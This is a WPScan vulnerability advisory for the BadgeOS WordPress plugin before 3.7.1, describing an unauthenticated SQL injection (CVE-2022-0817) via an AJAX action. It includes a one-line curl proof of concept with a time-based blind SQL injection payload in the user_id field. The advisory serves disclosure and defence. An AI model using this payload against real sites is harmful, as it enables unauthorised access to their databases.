WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

BadgeOS < 3.7.1 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Note: v3.7.1 removed the AJAX actions from being available to unauthenticated users, however the SQLi is still present but exploitable by authenticated users and a separate advisory has been made

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get-achievements&total_only=true&user_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb'

Affects Plugins

badgeos
No known fix

References

CVE
CVE-2022-0817

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
69263610-f454-4f27-80af-be523d25659e

Timeline

Publicly Published

2022-04-13 (about 7 months ago)

Added

2022-04-13 (about 7 months ago)

Last Updated

2022-08-23 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin